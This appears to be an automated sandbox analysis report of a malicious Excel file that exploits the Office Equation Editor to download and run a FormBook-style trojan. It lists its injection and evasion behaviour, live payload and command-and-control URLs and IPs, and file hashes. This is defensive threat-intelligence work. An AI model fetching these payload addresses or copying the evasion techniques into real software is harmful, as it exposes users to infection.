        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts1
        Shared Modules        		Logon Script (Windows)Logon Script (Windows)3
        Obfuscated Files or Information        		Security Account Manager116
        System Information Discovery        		SMB/Windows Admin Shares1
        Clipboard Data        		Automated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts23
        Exploitation for Client Execution        		Logon Script (Mac)Logon Script (Mac)1
        Software Packing        		NTDS251
        Security Software Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer122
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Rootkit        		LSA Secrets2
        Virtualization/Sandbox Evasion        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common111
        Masquerading        		Cached Domain Credentials2
        Process Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items2
        Virtualization/Sandbox Evasion        		DCSync1
        Remote System Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)612
        Process Injection        		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 626188 Sample: New order.xlsx Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 57 Multi AV Scanner detection for domain / URL 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 13 other signatures 2->63 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 26 2->16         started        process3 dnsIp4 45 104.168.33.25, 49171, 80 AS-COLOCROSSINGUS United States 11->45 39 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->39 dropped 41 C:\Users\Public\vbc.exe, PE32 11->41 dropped 83 Office equation editor establishes network connection 11->83 85 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->85 18 vbc.exe 19 11->18         started        43 C:\Users\user\Desktop\~$New order.xlsx, data 16->43 dropped file5 signatures6 process7 file8 37 C:\Users\user\AppData\Local\...\fdvucso.exe, PE32 18->37 dropped 65 Multi AV Scanner detection for dropped file 18->65 67 Machine Learning detection for dropped file 18->67 22 fdvucso.exe 18->22         started        signatures9 process10 signatures11 69 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->69 71 Tries to detect virtualization through RDTSC time measurements 22->71 73 Injects a PE file into a foreign processes 22->73 25 fdvucso.exe 22->25         started        process12 signatures13 75 Modifies the context of a thread in another process (thread injection) 25->75 77 Maps a DLL or memory area into another process 25->77 79 Sample uses process hollowing technique 25->79 81 Queues an APC in another process (thread injection) 25->81 28 explorer.exe 25->28 injected process14 dnsIp15 47 www.xinli-ac.com 154.222.70.249, 49172, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 28->47 49 www.insurancecentral.info 28->49 87 System process connects to network (likely due to code injection or exploit) 28->87 32 svchost.exe 28->32         started        signatures16 process17 signatures18 51 Modifies the context of a thread in another process (thread injection) 32->51 53 Maps a DLL or memory area into another process 32->53 55 Tries to detect virtualization through RDTSC time measurements 32->55 35 cmd.exe 32->35         started        process19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        New order.xlsx40%VirustotalBrowse
        New order.xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\vbc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe37%ReversingLabsWin32.Trojan.FormBook
        C:\Users\Public\vbc.exe37%ReversingLabsWin32.Trojan.FormBook

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        6.0.fdvucso.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        5.2.fdvucso.exe.120000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        6.0.fdvucso.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        6.0.fdvucso.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        6.2.fdvucso.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        www.insurancecentral.info1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        www.worklifefirewalls.com/m9y5/1%VirustotalBrowse
        www.worklifefirewalls.com/m9y5/0%Avira URL Cloudsafe
        http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
        http://104.168.33.25/gtb/vbc.exe13%VirustotalBrowse
        http://104.168.33.25/gtb/vbc.exe100%Avira URL Cloudmalware
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://www.mozilla.com00%URL Reputationsafe
        http://www.xinli-ac.com/m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr0%Avira URL Cloudsafe
        http://104.168.33.25/gtb/vbc.exehhC:0%Avira URL Cloudsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://treyresearch.net0%URL Reputationsafe
        http://104.168.33.25/gtb/vbc.exej0%Avira URL Cloudsafe
        http://java.sun.com0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://computername/printers/printername/.printer0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.xinli-ac.com
        		154.222.70.249
        		truetrue
          		unknown
          www.insurancecentral.info
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.worklifefirewalls.com/m9y5/true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		low
          http://104.168.33.25/gtb/vbc.exetrue
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          http://www.xinli-ac.com/m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drrfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
            		high
            http://investor.msn.comexplorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
              		high
              http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                		high
                http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.piriform.com/ccleanerqexplorer.exe, 00000007.00000000.1050559717.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019814122.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004615683.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://www.mozilla.com0explorer.exe, 00000007.00000000.998621484.00000000077C9000.00000004.00000010.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000007.00000000.1025885348.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999748239.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://104.168.33.25/gtb/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.966741326.0000000000554000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.965645699.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.996078709.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://104.168.33.25/gtb/vbc.exejEQNEDT32.EXE, 00000002.00000002.967017696.0000000003660000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://java.sun.comexplorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.999886715.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014689311.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999403275.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.990012033.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014285253.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002158677.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016145834.00000000003A6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://investor.msn.com/explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.999392147.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.%s.comPAexplorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		low
                                  http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.mozilla.orgexplorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1021455911.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995504335.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006602259.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.1023300017.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.168.33.25
                                        		unknownUnited States
                                        		36352AS-COLOCROSSINGUStrue
                                        154.222.70.249
                                        		www.xinli-ac.comSeychelles
                                        		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:626188
                                        Start date and time: 13/05/202217:19:452022-05-13 17:19:45 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 35s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:New order.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@11/16@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 26.8% (good quality ratio 25.2%)
                                        • Quality average: 75%
                                        • Quality standard deviation: 29.1%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:21:41API Interceptor105x Sleep call for process: EQNEDT32.EXE modified
                                        17:21:58API Interceptor36x Sleep call for process: fdvucso.exe modified
                                        17:22:21API Interceptor204x Sleep call for process: svchost.exe modified
                                        17:22:54API Interceptor1x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):277920
                                        Entropy (8bit):7.911203365939466
                                        Encrypted:false
                                        SSDEEP:6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
                                        MD5:69250F55FBFE48822C838B4EEAF33A0A
                                        SHA1:3E4E1DD9DBEB98EC354F7A03D455A0A38CCEA4E5
                                        SHA-256:752D0155C769033832D6845EABBA29BCE2B9D0EEDFF734B31A49C879ED08FF72
                                        SHA-512:8BB1F40992A1E829D7B6CE9751DEC84D849C50BDF72A1BCD8DA9362C8CCA0521729F9031FCF6F19438C147702EB601B31FCEC9EA9E230E2A00B0ED9B679E6AA6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 37%
                                        Reputation:low
                                        IE Cache URL:http://104.168.33.25/gtb/vbc.exe
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B8C79A7.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C67416EA.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D915B94D.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22AACBE.emf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):223752
                                        Entropy (8bit):3.2805343869701504
                                        Encrypted:false
                                        SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                        MD5:8E3A74F7AA420B02D34C69E625969C0A
                                        SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                        SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                        SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                        Malicious:false
                                        Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE9B77C.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

                                        C:\Users\user\AppData\Local\Temp\fdvucso.exe

                                        Download File
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):80384
                                        Entropy (8bit):6.294173225862387
                                        Encrypted:false
                                        SSDEEP:1536:jsTaC+v1CUfr0oxAomP3cX/4pi2sWjcdaXI:Ca5wUD1/ui5a4
                                        MD5:8CA00DF697FFA200C6CA558754C49F37
                                        SHA1:4A84F286472799A541BFEF17CFC9F746C7B692D3
                                        SHA-256:3D9400A6D9CA60C3BBE4212BA2727924E086A41CD2634D5CE1C4B8D9EE02F9DD
                                        SHA-512:1451AC47CF1FD29AF252E75657A99486165404CF891A43E3FB617DCE6C5168AF42D1B0E62EC34E463AE168AFCDF9763107629C1A4DA862760C21232F789538B3
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...a.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\kk2f9zwlwvo3ghi9f9

                                        Download File
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):189439
                                        Entropy (8bit):7.9917863154165305
                                        Encrypted:true
                                        SSDEEP:3072:UMe+HAL1YEIOIaeq6vQwmi25nAQquhWdC8cSiQmjgLzylj/YUhljifyucPqP:E9aVOIaeqlwmDKQqM8cSdvEgUH+fR+O
                                        MD5:BE2AEB25761BA4A8F20FBD04EA588971
                                        SHA1:95528D502D8DDB7A3ECF3524378876EC08FBD348
                                        SHA-256:586F3F57F0BA77EE87F999E6AE034375A5BB07D9A6CC95AB9D185EECD933A963
                                        SHA-512:8AAFDD4E154B8633D311DF4EF929DE4BD9B0F2147CA7582FE10359B8FC6048F4AE815C276589C8AC177C43F55F4015B2336C5CE6CB6FABAA08BE4B2BCA5C91D3
                                        Malicious:false
